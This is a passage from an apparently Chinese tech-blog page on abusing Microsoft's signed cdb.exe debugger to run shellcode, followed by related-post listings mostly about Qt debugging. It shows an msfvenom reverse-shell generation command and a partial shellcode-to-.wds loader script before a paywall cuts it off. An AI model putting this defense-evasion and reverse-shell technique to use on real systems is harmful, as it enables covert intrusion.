cdb.exe的利用

最新推荐文章于 2024-12-19 08:27:04 发布
原创 最新推荐文章于 2024-12-19 08:27:04 发布 · 1.7k 阅读 · 0
标签
#windows
本文介绍如何使用cdb.exe进行shellcode加载、DLL注入及执行shell命令等高级操作,为渗透测试人员提供有效工具。

cdb.exe的利用

0x01 简介

cdb 是安装 windows debugging tools 时自带的一个命令行调试工具,由微软签发证书。

在这里插入图片描述

0x02 cdb.exe加载shellcode

​ cdb.exe是调试工具,可以用来调试指定进程,并且可以在指定进程里分配RWX属性内存并写入shellcode,并执行该内存中的shellcode

首先使用 msfvenom 生成 shellcode。

msfvenom -p windows/x64/shell_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=3333 -f python

在这里插入图片描述

接下来,下载脚本https://github.com/Ryze-T/cdb-wds,并将 shellcode 替换为msf生成的。

python3 shellcode2wds.py

在这里插入图片描述

shellcode2wds.py脚本

import binascii

buf = "shellcode"

outfile = open("shell.wds","w")
outfile.write(".foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }"+"\n")
num = (int)(len
最低0.47元/天 解锁文章
C++学习(一一八)cdb gdb windbg调试器
hankern的专栏
07-04 2800
CDB是windbg的小兄弟,基于command line,对于我这个比较喜欢用command line的人,CDB比windbg更容易上手。 象GDB,CDB这些工具,命令都很多,但是我们只要熟记最常用的"三板斧"就可以工作了。 1.启动 1)直接调试: gdb program [core] cdb programorcdb -z DumpFile 2)attach方式 gdb attach pid cdb -pn ExeNameor...
qt调试——利用cdb工具调试
小孔明的专栏
02-12 2193
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools#small-classic-windbg-preview-logo-debugging-tools-for-windows-10-windbg 安装qt的时候要勾选: 那么启动qt: 工具=》选项 这里就是我...
BCD来调试的批处理
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-24 1036
set PATH=%PATH%;C:\Program Files\Windows Kits\8.0\Debuggers\x64 set DBG_OPTIONS=-v set DBG_LOGFILE=-logo D:\CDB\CdbgLogo.txt set DBG_SYMBOLS=-y SRV*D:\CDB\Symbols*http://msdl.microsoft.com/download
Qt 5.6.3 64bit 离线添加调试器cdb
qq_42815643的博客
03-15 1065
qt低版本在安装时并没有自带cdb调试器,需要额外安装。在某些特殊情况,我们需要离线安装cdb调试器,下面笔者详细的说明整体流程。
qtCreator安装windows sdk cdb
qikaihuting的博客
11-23 3417
window安装debugger cdb.exe
QT的debug编译器没有cdb.exe只有其它的无法debug调试
qq_41055532的博客
07-19 727
然后将以下内容勾选,点击change之后就可以在重启QT之后选择cdb.exe啦。一开始是没有图中的选项的,再我通过修改控制面板中的一个软件修改。1、打开控制面板,找到如下所示的应用。右击选择更改,不要选择卸载。
攻击技术研判|使用cdb.exe规避主机安全防御
wangluoanquan111的博客
08-20 241
基于内存的复杂恶意框架越来越常见,攻击者为了保护其重要的攻击武器资产,选择使用cdb.exe来作为初始的执行方式来对现有的安全策略进行绕过,一旦初始执行成功便可以转入合法进程的内存空间,掩盖其后续的恶意行为。参考。
探索安全边界:cdb-wds —— 利微软签名程序执行Shellcode的新方法
gitblog_00045的博客
06-09 512
探索安全边界:cdb-wds —— 利微软签名程序执行Shellcode的新方法 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 cdb-wds 是一个巧妙的开源工具,它利用了微软签名的合法二进制文件 cdb.exe 来无痕执行自定义的 Shellcode。这个项目旨在提供一种新的隐蔽方式,在目标系统上执行代码,而不容易被传统的反病毒软件检测到。附带的 calc.wds...
利用window自带的程序进行反弹shell——cdb,regsvr
渗透测试
08-31 1000
windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。(activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册)。Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。......
使用PowerDbg自动化Windbg调试过程
weixin_34104341的博客
11-12 114
PowerDbg是一个PowerShell脚本,使用这个脚本可以连接到windbg上面,远程控制windbg,可以通过编程的方式分析windbg输出;加之PowerDbg强大的编程能力,方便我们编写一些强大的调试脚本。 使用方法比较简单,从http://www.codeplex.com/下载powerdbg,这是一个开源的程序—实际上下载下来的就是一个...
如何在 Windows 下调试 Qt (MSVC) 应用程序
tylunas的博客
06-09 985
本文探讨了在 Windows 环境下,使用 Qt Creator 开发 Qt 应用程序可能会使用的调试方式。CDB,Visual Studio Addin和QDebug。
cdb.exe - 无法找到入口 dbgeng.dll
最新发布
William的博客
12-19 1336
我在用Qt creator时调试时遇到了以下错误: 无法定位程序输入点StackWalk2于动态链接库C:\Program Files(x86)\Windows Kits\10\Debuggers\x64\dbgeng.dll上
[Qt][Windows] Windows环境下Qt调试环境的搭建
ykun089的博客
09-04 1189
前言: Windows环境下,Qt使用CDB作为调试器,目前Qt安装包不会自带此调试器,因此需要自行下载和配置。 下载: CDB的下载目前没有找到比较好的官方途径,不过可以 “曲线救国” ,微软钦定的调试器windbg会自带CDB调试器,可能windbg就是对CDB的图形化封装。因此我们直接去微软官网下载windbg。 配置: 在windbg的安装路径中找到 cbd.exe (这里建议把windbg的 x86版本 和 x64版本都下载下来),把他们分别拷贝到相应的Qt安装版本的bin目..
the cdb process terminated
tajon1226的专栏
12-02 7741
1、下载VS2015社区版 Update3安装 2、安装qt-opensource-windows-x86-msvc2015-5.7.0.exe 3、想调试的时候一直弹出“the cdb process terminated”,安装各种windbk,还是依然弹出the cdb process terminated!!! 按照下面文章装各种windbk http://blog.csd
转载:Qt Creator的CDB调试器--使用技巧与心得,重点是Symbols Path设置
zp403705726的专栏
11-12 4295
windows系统下主要的调试器: CDB ,只能调试用户程序,只有控制台界面,以命令行形式工作 NTSD, 只能调试用户程序,只有控制台界面,以命令行形式工作 KD,主要用于内核调试,有时候也用于用户态调试,只有控制台界面,以命令行形式工作 WinDbg,在用户态、内核态下都能够发挥调试功能,采用了可视化的用户界面 Qt Creator使用调试器可以是gdb和cdb,本篇文章只介绍cdb。 一、安装CDB CDB(command line debugger)是给控制台调试代码用的,C.
windows命令行调试器+进程转储工具
随心动,随风行
12-22 1335
文章目录工具介绍适用场景工具获取用法示例命令行语法脚本配置Settings 部分Exceptions 部分Breakpoints 部分参考文档 工具介绍 CDB.exe 及 ADPlus.exe 在 WinDbg.exe 同目录下; CDB.exeWindows 控制台调试器,不具有图形用户界面; ADPlus.exe 自动化了 CDB.exe 的调试操作; ADPlus.exe 可以部署在生产环境,对性能几乎无影响; ADPlus.exe 可以根据配置自动生成内存转储和日志文件。 监视异常类型:
Windows下,Qt利用CDB远程调试
joyopirate的博客
10-09 2584
参考:https://blog.csdn.net/aqtata/article/details/24926633 基本步骤参考上面的博客,但是补充一些。 1.目前我用的Qt版本是Qt5.12.9+vs2017的,可能Qtcreator和上面的博客不太一样,所以在复制qtcreatorcdbext.dll还要把另外那个python35.dll也一起拷贝过去远程主机那边。 2.拷贝好dll、设置好环境变量之后,远程主机还需要安装python3.5(一定要是3.5.x版本,否则不行),下载地址是 https:/
使用CDB调试Qt代码
热门推荐
11-07 1万+
关键词:Qt 5、CDB、pdb 平台:Win 7 64位 Qt版本:Qt 5.1.1  IDE:Qt Creator 编译器:msvc2012-x64 目前,最新版本的Qt是Qt 5.1.1。针对Windows NT平台,Qt官网提供了两种安装包:一种使用MinGW作为默认编译器,一种使用MSVC(VS2010或VS2012)作为默认编译器。 MinGW中已附带gcc、gdb等工具。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值